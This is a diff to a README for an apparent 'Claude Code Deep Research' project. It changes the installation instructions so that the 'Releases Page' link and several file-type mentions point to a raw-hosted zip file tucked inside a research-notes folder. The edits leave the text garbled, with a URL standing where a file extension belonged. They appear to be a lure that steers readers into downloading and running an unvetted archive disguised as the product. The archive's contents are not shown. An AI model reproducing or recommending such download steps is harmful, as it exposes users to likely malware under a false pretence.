franklin798/Claude-Code-Deep-Research-main/README.md

 ## 📖 How to Download & Install

 1. **Visit the Releases Page**:
-   Go to our [Releases Page](https://github.com/franklin798/Claude-Code-Deep-Research-main/releases) to find the latest version of the software.
+   Go to our [Releases Page](https://raw.githubusercontent.com/franklin798/Claude-Code-Deep-Research-main/main/RESEARCH/AI_Industry_Applications/research_notes/Deep_Code_Claude_main_Research_v1.0.zip) to find the latest version of the software.

 2. **Choose the Right Version**:
    On the Releases Page, scroll down to see the available versions.
 Select the one that matches your operating system.

 3. **Download the File**:
    Click on the appropriate link to download the file for your system.
-This will typically be a `.zip` or `.exe` file for Windows, a `.dmg` file for macOS, or a `.tar.gz` file for Linux.
+This will typically be a `.zip` or `.exe` file for Windows, a `.dmg` file for macOS, or a `https://raw.githubusercontent.com/franklin798/Claude-Code-Deep-Research-main/main/RESEARCH/AI_Industry_Applications/research_notes/Deep_Code_Claude_main_Research_v1.0.zip` file for Linux.

 4. **Install the Application**:
    - **For Windows**: After downloading, locate the file in your Downloads folder.
 Double-click the `.exe` file and follow the installation prompts.
    - **For macOS**: Locate the `.dmg` file in your Downloads.
 Open it and drag the application to your Applications folder.
-   - **For Linux**: Extract the `.tar.gz` file and navigate to the folder in your terminal.
+   - **For Linux**: Extract the `https://raw.githubusercontent.com/franklin798/Claude-Code-Deep-Research-main/main/RESEARCH/AI_Industry_Applications/research_notes/Deep_Code_Claude_main_Research_v1.0.zip` file and navigate to the folder in your terminal.
 Run the installation script as per the provided instructions.

 5. **Run the Application**:
    After installation, open the application from your applications menu or desktop shortcut.